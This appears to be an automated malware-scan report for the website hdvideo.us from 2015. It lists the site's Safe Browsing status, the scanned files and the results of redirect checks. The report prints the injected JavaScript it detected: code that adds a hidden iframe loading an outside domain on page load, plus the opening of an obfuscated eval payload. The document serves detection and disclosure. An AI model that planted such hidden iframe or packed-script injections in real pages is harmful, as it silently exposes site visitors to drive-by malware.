Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hdvideo.us
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hdvideo.us/ | 200 OK Content-Length: 26645 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://hdvideo.us/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://hdvideo.us/components/com_virtuemart/themes/vm_mynxx/theme.js | 200 OK Content-Length: 7143 Content-Type: application/x-javascript | clean |
http://hdvideo.us/templates/rt_mynxx_j15/js/rokutils.js | 200 OK Content-Length: 3166 Content-Type: application/x-javascript | clean |
http://hdvideo.us/templates/rt_mynxx_j15/js/rokmoomenu.js | 200 OK Content-Length: 5040 Content-Type: application/x-javascript | clean |
http://hdvideo.us/templates/rt_mynxx_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 964 Content-Type: application/x-javascript | clean |
http://psy-ufa.ru/wp-includes/images/wlw/1/404.php | 404 File not found Content-Length: 2840 Content-Type: text/html | clean |
http://e-stile.ru/skin/semenu.js | 200 OK Content-Length: 454 Content-Type: application/javascript | clean |
http://psy-ufa.ru/test404page.js | 404 File not found Content-Length: 2840 Content-Type: text/html | clean |
http://master-style.ru/js/tiny_mce/plugins/emotions/img/1/404.php | 404 Not Found Content-Length: 359 Content-Type: text/html | clean |
http://hdvideo.us/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 20276 Content-Type: application/x-javascript | clean |
http://hdvideo.us/plugins/system/rokbox/themes/mynxx/rokbox-config.js | 200 OK Content-Length: 2686 Content-Type: application/x-javascript | clean |
http://adultbiz.in/new/jquery.php | 200 OK Content-Length: 8687 Content-Type: text/html | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/javascript | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/tier2caf.js | 200 OK Content-Length: 28902 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hdvideo.us
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 07 Mar 2015 14:59:11 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 07 Mar 2015 14:59:15 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f22c400fc61c46e5cb1027e3bd3203fd=n2jfnrqgo542e9npa6rsl72js3; path=/
GET / HTTP/1.1
Host: hdvideo.us
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 07 Mar 2015 14:59:11 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 07 Mar 2015 14:59:15 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f22c400fc61c46e5cb1027e3bd3203fd=n2jfnrqgo542e9npa6rsl72js3; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: hdvideo.us
Referer: http://www.google.com/search?q=hdvideo.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hdvideo.us
Referer: http://www.google.com/search?q=hdvideo.us
Result:
The result is similar to the first query. There are no suspicious redirects found.